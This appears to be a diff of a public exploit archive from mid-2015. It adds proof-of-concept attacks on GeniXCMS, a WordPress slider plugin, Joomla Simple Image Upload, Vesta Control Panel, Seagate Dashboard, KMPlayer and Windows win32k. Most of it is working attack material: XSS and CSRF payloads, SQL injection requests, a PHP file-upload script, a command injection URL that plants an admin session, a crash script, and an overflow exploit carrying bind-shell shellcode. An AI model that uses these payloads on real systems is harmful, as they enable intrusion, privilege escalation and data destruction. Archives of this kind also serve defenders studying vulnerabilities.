http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&q=1'<script>alert('XSS By Hyp3rlinx')</script>
Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 21, 2015 : Public Disclosure
Severity Level:
=========================================================
Med
Description:
=========================================================
Request Method(s): [+] GET & POST
Vulnerable Product: [+] GeniXCMS 0.0.3
Vulnerable Parameter(s): [+] q, content & title
Affected Area(s): [+] index.php
===============================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that
it is not altered except by reformatting it, and that due credit is given. Permission is
explicitly given for insertion in vulnerability databases and similar, provided that
due credit is given to the author. The author is not responsible for any misuse of the
information contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
(hyp3rlinx)

278
platforms/php/webapps/37361.txt Executable file
View file

@ -0,0 +1,278 @@
# Exploit Title: WordPress: wordpress huge-it-slider 2.7.5 & Persistent JS-HTML Code injection, Arbitrary slider deletion
# Date: 2015-06-23
# Google Dork: intitle:"index of" intext:"/wp-content/plugins/slider-image/"
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: https://downloads.wordpress.org/plugin/slider-image.latest-stable.zip
# Version: 2.7.5
# Tested on: windows 7 ultimate + Firefox.
# video demo: https://www.youtube.com/watch?v=RTLAbmyBIU8
====================================================
* CSRF + Persistent JS/HTML Injection
====================================================
=====================
DECRIPTION
=====================
An attacker can make a user with access privileges to a page containing malicious script
and send some parameters injected JavaScript to the database.
============================
vulnerable POST parameters
============================
//variables with variation names//
order_by_[variation_number]
titleimage[variation_number]
sl_url[variation_number]
sl_link_target[variation_number]
im_description[variation_number]
imagess[variation_number]
//variables with constant names//
sl_pausetime
sl_changespeed
===============
EXPLOTATION
===============
variable numbers can be extracted from a published page containing the slider. and make all
parameters injected with code JS / HTML.
-------------------
EXAMPLE
-------------------
[Extracting data for use]
In a vulnerable site and has posted a slider, the malicious user can extract information
the attack is successful.
-----------------------------------------------------------------------------------------
[variation_number] is a variable number that could be extracted as follows.
-----------------------------------------------------------------------------------------
The attacker sees the following framento source code of the page with slider:
<!-- ##########################DOTS######################### -->
<div class="huge_it_slideshow_dots_container_2"> [ <---SLIDER_ID_FOUND=2 ]
<div class="huge_it_slideshow_dots_thumbnails_2">
<div id="huge_it_dots_0_1" class="huge_it_slideshow_dots_1 huge_it_slideshow_dots_active_1"
onclick="huge_it_change_image_1(parseInt(jQuery('#huge_it_current_image_key_1').val()), '0', data_1,false,true);
return false;"
image_id="14" [ <---ITS_VARIATION_NUMBER!!! ]
image_key="0"></div>
</div>
<a id="huge_it_slideshow_left_1" href="#" >
<div id="huge_it_slideshow_left-ico_1">
<div><i class="huge_it_slideshow_prev_btn_1 fa"></i></div></div>
</a>
<a id="huge_it_slideshow_right_1" href="#" >
<div id="huge_it_slideshow_right-ico_1 , data_1">
<div><i class="huge_it_slideshow_next_btn_1 fa"></i></div></div>
</a>
</div>
<!-- ##########################IMAGES######################### -->
-----------------------------------------------------------------------------------
Classes tags [<div>] have a number at the end that is the id of the slider.
Also labeled [<div id = "huge_it_dots_ ...>] has the property [image_id] which is the
POST variable number of vulnerable parameters.
============================================
POC [DATA RELATING TO THE ABOVE]
============================================
------------ SLIDER_ID
URL REQUEST |
------------
http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&id=2&task=apply
--------
POSTDATA
--------
name=i0akiN-SEC&order_by_14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&imagess14=&
titleimage14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
sl_url14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_link_target14=&
sl_pausetime=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
sl_changespeed=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
im_description14=as%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Fi0akiN_HACK%2F%29%3B%3C%2Fscript%3E&
imagess14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_width=500&
sl_height=300&pause_on_hover=off&slider_effects_list=cubeH&sl_position=center&task=
--------------------
RESPONSE ADMIN PAGE
--------------------
...
<input class="order_by" type="hidden" name="order_by_14" value="0" />
<div class="image-container">
<img src="" onmouseover=alert(/i0akiN_hack/) a="" />
<div>
<script>
... </script>
<input type="hidden" name="imagess14" id="_unique_name14" value="" onmouseover=alert(/i0akiN_hack/) a="" />
<span class="wp-media-buttons-icon"></span>
<div class="huge-it-editnewuploader uploader button14 add-new-image">
<input type="button" class="button14 wp-media-buttons-icon editimageicon" name="_unique_name_button14" id="_unique_name_button14" value="Edit image" />
</div>
</div>
</div>
<div class="image-options">
<div>
<label for="titleimage14">Title:</label>
<input class="text_area" type="text" id="titleimage14" name="titleimage14" id="titleimage14" value="" onmouseover=alert(/i0akiN_hack/) a="">
</div>
<div class="description-block">
<label for="im_description14">Description:</label>
<textarea id="im_description14" name="im_description14" >as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script>&lt;/textarea&gt;
</div>
<div class="link-block">
<label for="sl_url14">URL:</label>
<input class="text_area url-input" type="text" id="sl_url14" name="sl_url14" value="" onmouseover=alert(/i0akiN_hack/) a="" >
<label class="long" for="sl_link_target14">Open in new tab</label>
<input type="hidden" name="sl_link_target14" value="" />
<input class="link_target" type="checkbox" id="sl_link_target14" name="sl_link_target14" />
</div>
<div class="remove-image-container">
<a class="button remove-image" href="admin.php?page=sliders_huge_it_slider&id=2&task=apply&removeslide=14">Remove Image</a>
</div>
</div>
<div class="clear"></div>
</li>
</ul>
</div>
</div>
<div id="postbox-container-1" class="postbox-container">
<div id="side-sortables" class="meta-box-sortables ui-sortable">
<div id="slider-unique-options" class="postbox">
...
<li>
<label for="sl_pausetime">Pause time</label>
<input type="text" name="sl_pausetime" id="sl_pausetime" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
</li>
<li>
<label for="sl_changespeed">Change speed</label>
<input type="text" name="sl_changespeed" id="sl_changespeed" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
</li>
...
-----------------------------------------
RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
-----------------------------------------
...
<script>
var data_2 = [];
var event_stack_2 = [];
video_is_playing_2 = false;
data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as&lt;/textarea&gt;
<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";
===<!-- SUCCESFULL INJECTION :) -->===
var huge_it_trans_in_progress_2 = false;
var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
var huge_it_playInterval_2;
// Stop autoplay.
window.clearInterval(huge_it_playInterval_2);
....
<!-- ##########################IMAGES######################### -->
<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">
<div class="huge_it_slide_container_2">
<div class="huge_it_slide_bg_2">
<ul class="huge_it_slider_2">
<li class="huge_it_slideshow_image_item_2" id="image_id_2_0">
<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2"
src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
</a>
<div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div>
<div class="huge_it_slideshow_description_text_2 ">as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script> </div>
</li>
<input type="hidden" id="huge_it_current_image_key_2" value="0" />
</ul>
</div>
</div>
</div>
...
-----------------------------------------
RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
-----------------------------------------
...
<script>
var data_2 = [];
var event_stack_2 = [];
video_is_playing_2 = false;
data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as&lt;/textarea&gt;
<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";
===<!-- SUCCESFULL INJECTION :) -->===
var huge_it_trans_in_progress_2 = false;
var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
var huge_it_playInterval_2;
// Stop autoplay.
window.clearInterval(huge_it_playInterval_2);
....
<!-- ##########################IMAGES######################### -->
<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">
<div class="huge_it_slide_container_2">
<div class="huge_it_slide_bg_2">
<ul class="huge_it_slider_2">
<li class="huge_it_slideshow_image_item_2" id="image_id_2_0">
<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2"
src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
</a>
<div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div>
<div class="huge_it_slideshow_description_text_2 ">as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script> </div>
</li>
<input type="hidden" id="huge_it_current_image_key_2" value="0" />
</ul>
</div>
</div>
</div>
...
====================================
* CSRF & ARBITRARY SLIDER DELETION
====================================
=====================
POC
=====================
//delete first 100 sliders
<script>
function sendData( id_slider ){
var req=new XMLHttpRequest();
req.open("GET","http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&task=remove_cat&id="+id_slider,true);
req.withCredentials="true";
req.send();
}
for(var i=0;i<100;i++){
sendData( i );
}
</script>
token authentication not found!

100
platforms/php/webapps/37363.txt Executable file
View file

@ -0,0 +1,100 @@
# Exploit Title: Genixcms register.php multiple SQL vuln
# Date: 2015-06-23
# Exploit Author: cfreer (poc-lab)
# Vendor Homepage: http://www.genixcms.org
# Software Link: https://codeload.github.com/semplon/GeniXCMS/zip/master/GeniXCMS-master.zip
# Version: 0.0.3
# Tested on: Apache/2.4.7 (Win32)
# CVE : CVE-2015-3933
=====================
SOFTWARE DESCRIPTION
=====================
Free and Opensource Content Management System, a new approach of simple and lightweight CMS. Get a new experience of a fast and easy to modify CMS.
=============================
VULNERABILITY: SQL Injection
=============================
Poc
1、Genixcms register.php email SQL vuln
HTTP Data Stream
POST /genixcms/register.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
email='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&pass1=cfreer&pass2=cfreer&register=1&token=&userid=poc-lab
\inc\lib\User.class.php
public static function is_email($vars){
if(isset($_GET['act']) && $_GET['act'] == 'edit'){
$where = "AND `id` != '{$_GET['id']}' ";
}else{
$where = '';
}
$e = Db::result("SELECT * FROM `user` WHERE `email` = '{$vars}' {$where}");
if(Db::$num_rows > 0){
return false;
}else{
return true;
}
}
==============================================================================================================================================
2、Genixcms register.php userid SQL vuln
HTTP Data Stream
POST /genixcms/register.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 224
email=websec@poc-lab.org&pass1=poc-lab.org&pass2=poc-lab.org&register=1&token=&userid='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'
\inc\lib\User.class.php
public static function is_exist($user) {
if(isset($_GET['act']) && $_GET['act'] == 'edit'){
$where = "AND `id` != '{$_GET['id']}' ";
}else{
$where = '';
}
$usr = Db::result("SELECT `userid` FROM `user` WHERE `userid` = '{$user}' {$where} ");
$n = Db::$num_rows;
if($n > 0 ){
return false;
}else{
return true;
}
}

70
platforms/php/webapps/37364.txt Executable file
View file

@ -0,0 +1,70 @@
# Exploit Title: Joomla Simple Image Upload - Arbitrary File Upload
# Google Dork: inurl:option=com_simpleimageupload
# Date: 23.06.2015
# Exploit Author: CrashBandicot @DosPerl
# Vendor Homepage: http://tuts4you.de/
# Software Link: http://tuts4you.de/96-development/156-simpleimageupload
# Version: 1.0
# Tested on: MsWin32
# Vuln Same to Com_Media Vulnerability
# Live Request :
POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------247062787817068
-----------------------------247062787817068\r\n
Content-Disposition: form-data; name="Filedata"; filename="L0v3.php."\r\n
Content-Type: application/x-php\r\n
\r\n
0wn3d ! ;)\r\n
-----------------------------247062787817068\r\n
Content-Disposition: form-data; name="return-url"\r\n
\r\n
aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=\r\n
-----------------------------247062787817068--\r\n
# Exploit :
<?php
echo '<form action="#" method="post" enctype="multipart/form-data">
<input type="text" name="target" value="www.localhost.com" /><input type="submit" name="Pwn" value="Pwn!" />
</form>';
if($_POST) {
$target = $_POST['target'];
$file = "0wn3d ! ;)";
$header = array("Content-Type: application/x-php",
"Content-Disposition: form-data; name=\"Filedata\"; file=\"L0v3.php.\"");
$ch = curl_init("http://".$target."/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36");
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$file", "return-url" => "aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=",));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
} else { die(); }
?>
# Path of File : 127.0.0.1/images/[Rand0mString]L0v3.php
# Sh00t to Mr_AnarShi-T;

60
platforms/php/webapps/37369.txt Executable file
View file

@ -0,0 +1,60 @@
Advisory ID: HTB23261
Product: Vesta Control Panel
Vendor: http://vestacp.com
Vulnerable Version(s): 0.9.8 and probably prior
Tested Version: 0.9.8
Advisory Publication: May 20, 2015 [without technical details]
Vendor Notification: May 20, 2015
Vendor Patch: June 3, 2015
Public Disclosure: June 17, 2015
Vulnerability Type: OS Command Injection [CWE-78]
CVE Reference: CVE-2015-4117
Risk Level: Critical
CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered critical vulnerability in Vesta Control Panel, which can be exploited to execute arbitrary system commands and gain complete access to the vulnerable system.
The vulnerability exists due to insufficient filtration of user-input passed via the "backup" HTTP GET parametre to "/list/backup/index.php" before using it in the PHP 'exec()' function. A remote authenticated attacker can inject arbitrary commands and execute them on the system with privileges of the default Vesta Control Panel "admin" account.
Successful exploitation of this vulnerability may allow an attacker to gain complete control over the Vesta Control Panel and use it to advance his privileges on the system, manage installed services, reconfigure firewall, etc. Since Vesta Control Panel is a multiuser control panel for hosting multiple websites, any registered client can use the described vulnerability to compromise the entire system.
A simple exploit below will create a PHP session file in "/tmp/" directory with administrative access to Vesta Control Panel:
https://192.168.189.133:8083/list/backup/index.php?backup=123%27%20||%20 echo 'V0VCX1NZU1RFTXxzOjc6ImFwYWNoZTIiO1dFQl9SR1JPVVBTfHM6ODoid3d3LWRhdGEiO1dFQl9QT1JUfHM6NDoiODA4MCI7V0VCX1NTTHxzOjc6Im1vZF9zc2wiO1dFQl9TU0xfUE9SVHxzOjQ6Ijg0NDMiO1BST1hZX1NZU1RFTXxzOjU6Im5naW54IjtQUk9YWV9QT1JUfHM6MjoiODAiO1BST1hZX1NTTF9QT1JUfHM6MzoiNDQzIjtGVFBfU1lTVEVNfHM6NjoidnNmdHBkIjtNQUlMX1NZU1RFTXxzOjU6ImV4aW00IjtJTUFQX1NZU1RFTXxzOjc6ImRvdmVjb3QiO0FOVElWSVJVU19TWVNURU18czowOiIiO0FOVElTUEFNX1NZU1RFTXxzOjA6IiI7REJfU1lTVEVNfHM6NToibXlzcWwiO0ROU19TWVNURU18czo1OiJiaW5kOSI7U1RBVFNfU1lTVEVNfHM6MTc6IndlYmFsaXplcixhd3N0YXRzIjtCQUNLVVBfU1lTVEVNfHM6NToibG9jYWwiO0NST05fU1lTVEVNfHM6NDoiY3JvbiI7RElTS19RVU9UQXxzOjI6Im5vIjtGSVJFV0FMTF9TWVNURU18czo4OiJpcHRhYmxlcyI7RklSRVdBTExfRVhURU5TSU9OfHM6ODoiZmFpbDJiYW4iO1JFUE9TSVRPUll8czo1OiJjbW1udCI7VkVSU0lPTnxzOjU6IjAuOS44IjtMQU5HVUFHRXxzOjI6ImVuIjtsYW5ndWFnZXxzOjI6ImVuIjt1c2VyfHM6NToiYWRtaW4iO2JhY2t8czoxMToiL2xpc3QvdXNlci8iOw==' | base64 --decode > /tmp/sess_12345%20||%20echo%20\
After successful creation of PHP session file, the following cookie can be used to gain administrative access:
GET / HTTP/1.1
Cookie: mp_b5e6ddf58b2d02245a7a19005d1cec48_mixpanel=%7B%22distinct_id%22%3A%20%2214d5bb8613c39-02d2d6f80b48dc8-44564136-1fa400-14d5bb8613d828%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2F192.168.189.133%3A8000%2F%22%2C%22%24initial_referring_domain%22%3A%20%22192.168.189.133%3A8000%22%7D; PHPSESSID=12345
-----------------------------------------------------------------------------------------------
Solution:
Update to Vesta Control Panel 0.9.8-14
More Information:
http://vestacp.com/roadmap/#history
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23261 - https://www.htbridge.com/advisory/HTB23261 - OS Command Injection in Vesta Control Panel.
[2] Vesta Control Panel - http://vestacp.com - Open Source web hosting control panel with premium features, secure, advanced and minimalistic design
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

49
platforms/windows/dos/37343.py Executable file
View file

@ -0,0 +1,49 @@
#!/usr/bin/env python
# Exploit Title: Crash PoC Seagate Dashboard 4.0.21.0
# Date: 2015-06-20
# Exploit Author: HexTitan
# Vendor Homepage: http://www.seagate.com/
# Software Link: http://www.seagate.com/support/downloads/item/seagate-dashboard-windows-master-dl/
# Version: 4.0.21.0
# Tested on: Windows 8.1 32bit
#
#Description:
#
#The dasboard tool is part of the Seagate software solution for storage. The Dashboard.exe process opens a random port in the 5000-6000 range on each launch.
#
#PoC:
#
#The attached Python script will send 3100 A's to the target port. This will cause a crash in the Dashboard.exe process.
#
#
#Solution:
#
#Until a fix is available, firewall the Dashboard.exe process.
import socket
import sys
import os
target = '[ip]'
port = [port]
buffer = 'A'*3100
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect = s.connect((target, port))
print '[*] Connected to ' + target
except:
print '[-] Unable to connect to ' + target
sys.exit(0)
s.send(buffer)
print '[!] Malformed request sent\n'
s.close()

103
platforms/windows/local/37344.py Executable file
View file

@ -0,0 +1,103 @@
#!/usr/bin/python
#
# KMPlayer 3.9.1.136 Capture Unicode Buffer Overflow (ASLR Bypass)
#
# Author: Naser Farhadi
#
# Date: 21 June 2015 # Version: 3.9.1.136 # Tested on: Windows 7 SP1 (32 bit)
#
# Usage:
# chmod +x KMPlayer.py
# python KMPlayer.py
# Alt+c | Video Capture | Alt+a | Audio Capture
# paste content of KMPlayer.txt into Filename
# nc 172.20.10.14 333
#
# Video: http://youtu.be/9gtZxR2ioTM
##
buffer = (
"\x50" # PUSH EAX
"\x40" # Venetian Padding => ADD BYTE PTR DS:[EAX],AL
"\x5c" # POP ESP
"\x40" # Venetian Padding => ADD BYTE PTR DS:[EAX],AL
"\x61" # POPAD
"\x45" # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
""+("\x5f\x45" * 125)+"" # (POP EDI/Venetian Padding => ADD BYTE PTR SS:[EBP],AL)*125
"\x54" # PUSH ESP
"\x45" # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
"\x45" # Padding => INC EBP
"\x45" # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
"\x61" # POPAD
"\x47" # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
"\x33\x77" # POP EBP/RETN from KMPlayer.exe
"\x58" # POP EAX
"\x47" # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
"\x33\x77" # POP EBP/RETN from KMPlayer.exe
"\x58" # POP EAX
"\x47" # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
"\x33\x77" # POP EBP/RETN from KMPlayer.exe
"\x5d" # POP EBP
"\x47" # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
"\x71" # Padding => JNO SHORT 0x2
"\x71" # Venetian Padding => ADD BYTE PTR DS:[ECX],DH
)
# msfpayload windows/shell_bind_tcp LPORT=333 R|msfencode -e x86/unicode_mixed BufferRegister=ESP -t c
shellcode = ("\x54\x47\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
"\x49\x41\x6a\x58\x41\x51\x41\x44\x41\x5a\x41\x42\x41\x52\x41"
"\x4c\x41\x59\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49"
"\x41\x49\x41\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
"\x41\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41\x5a"
"\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
"\x75\x34\x4a\x42\x69\x6c\x39\x58\x31\x72\x79\x70\x4d\x30\x39"
"\x70\x53\x30\x75\x39\x67\x75\x4e\x51\x35\x70\x62\x44\x52\x6b"
"\x70\x50\x6e\x50\x52\x6b\x52\x32\x4c\x4c\x54\x4b\x72\x32\x4b"
"\x64\x42\x6b\x52\x52\x4d\x58\x5a\x6f\x38\x37\x6f\x5a\x6c\x66"
"\x4c\x71\x59\x6f\x36\x4c\x4d\x6c\x30\x61\x51\x6c\x4a\x62\x6c"
"\x6c\x6f\x30\x69\x31\x78\x4f\x4a\x6d\x59\x71\x77\x57\x67\x72"
"\x4b\x42\x70\x52\x6e\x77\x62\x6b\x6e\x72\x6a\x70\x32\x6b\x6e"
"\x6a\x6d\x6c\x74\x4b\x30\x4c\x5a\x71\x32\x58\x49\x53\x70\x48"
"\x6d\x31\x57\x61\x4e\x71\x44\x4b\x61\x49\x6d\x50\x6a\x61\x4a"
"\x33\x72\x6b\x71\x39\x6e\x38\x58\x63\x6d\x6a\x70\x49\x62\x6b"
"\x6c\x74\x74\x4b\x4d\x31\x58\x56\x4d\x61\x69\x6f\x54\x6c\x76"
"\x61\x78\x4f\x7a\x6d\x69\x71\x47\x57\x4f\x48\x57\x70\x43\x45"
"\x58\x76\x5a\x63\x61\x6d\x59\x68\x6f\x4b\x61\x6d\x6c\x64\x33"
"\x45\x57\x74\x30\x58\x54\x4b\x30\x58\x6d\x54\x69\x71\x37\x63"
"\x70\x66\x44\x4b\x4c\x4c\x70\x4b\x34\x4b\x6f\x68\x4d\x4c\x59"
"\x71\x68\x53\x64\x4b\x6c\x44\x44\x4b\x5a\x61\x78\x50\x73\x59"
"\x51\x34\x6c\x64\x6e\x44\x61\x4b\x4f\x6b\x43\x31\x4f\x69\x31"
"\x4a\x70\x51\x49\x6f\x49\x50\x71\x4f\x61\x4f\x70\x5a\x72\x6b"
"\x6c\x52\x48\x6b\x64\x4d\x51\x4d\x72\x48\x6c\x73\x70\x32\x49"
"\x70\x49\x70\x33\x38\x43\x47\x52\x53\x4d\x62\x71\x4f\x4e\x74"
"\x70\x68\x50\x4c\x44\x37\x6c\x66\x6c\x47\x39\x6f\x47\x65\x37"
"\x48\x42\x70\x6a\x61\x4d\x30\x39\x70\x4d\x59\x37\x54\x42\x34"
"\x30\x50\x33\x38\x4b\x79\x35\x30\x42\x4b\x59\x70\x4b\x4f\x46"
"\x75\x31\x5a\x39\x78\x30\x59\x30\x50\x37\x72\x39\x6d\x31\x30"
"\x42\x30\x4d\x70\x72\x30\x61\x58\x38\x6a\x4c\x4f\x57\x6f\x77"
"\x70\x79\x6f\x66\x75\x56\x37\x53\x38\x6b\x52\x39\x70\x79\x71"
"\x4e\x6d\x61\x79\x67\x76\x62\x4a\x4a\x70\x52\x36\x6e\x77\x51"
"\x58\x57\x52\x59\x4b\x70\x37\x62\x47\x49\x6f\x38\x55\x72\x37"
"\x42\x48\x74\x77\x69\x59\x4f\x48\x69\x6f\x69\x6f\x76\x75\x6f"
"\x67\x63\x38\x52\x54\x5a\x4c\x4f\x4b\x68\x61\x79\x6f\x68\x55"
"\x31\x47\x46\x37\x62\x48\x54\x35\x72\x4e\x6e\x6d\x50\x61\x69"
"\x6f\x77\x65\x63\x38\x62\x43\x62\x4d\x42\x44\x6d\x30\x75\x39"
"\x58\x63\x32\x37\x6e\x77\x50\x57\x50\x31\x6a\x56\x71\x5a\x6e"
"\x32\x32\x39\x51\x46\x59\x52\x49\x6d\x52\x46\x38\x47\x70\x44"
"\x4f\x34\x4f\x4c\x4d\x31\x6b\x51\x74\x4d\x6e\x64\x6f\x34\x6c"
"\x50\x76\x66\x6b\x50\x6e\x64\x51\x44\x32\x30\x50\x56\x71\x46"
"\x6e\x76\x4f\x56\x70\x56\x50\x4e\x62\x36\x6f\x66\x70\x53\x71"
"\x46\x51\x58\x54\x39\x46\x6c\x6d\x6f\x31\x76\x4b\x4f\x79\x45"
"\x34\x49\x59\x50\x50\x4e\x6f\x66\x50\x46\x4b\x4f\x30\x30\x63"
"\x38\x6c\x48\x54\x47\x6d\x4d\x33\x30\x39\x6f\x66\x75\x75\x6b"
"\x68\x70\x37\x45\x44\x62\x30\x56\x53\x38\x54\x66\x74\x55\x65"
"\x6d\x53\x6d\x4b\x4f\x79\x45\x6d\x6c\x59\x76\x43\x4c\x6a\x6a"
"\x35\x30\x4b\x4b\x59\x50\x70\x75\x6b\x55\x55\x6b\x30\x47\x7a"
"\x73\x33\x42\x50\x6f\x30\x6a\x59\x70\x32\x33\x6b\x4f\x79\x45"
"\x41\x41")
buffer += shellcode + "\x71" * (1534 - len(shellcode))
open("KMPlayer.txt", "wb").write(buffer)

137
platforms/windows/local/37367.rb Executable file
View file

@ -0,0 +1,137 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows ClientCopyImage Win32k Exploit',
'Description' => %q{
This module exploits improper object handling in the win32k.sys kernel mode driver.
This module has been tested on vulnerable builds of Windows 7 x64 and x86, and
Windows 2008 R2 SP1 x64.
},
'License' => MSF_LICENSE,
'Author' => [
'Unknown', # vulnerability discovery and exploit in the wild
'hfirefox', # Code released on github
'OJ Reeves' # msf module
],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
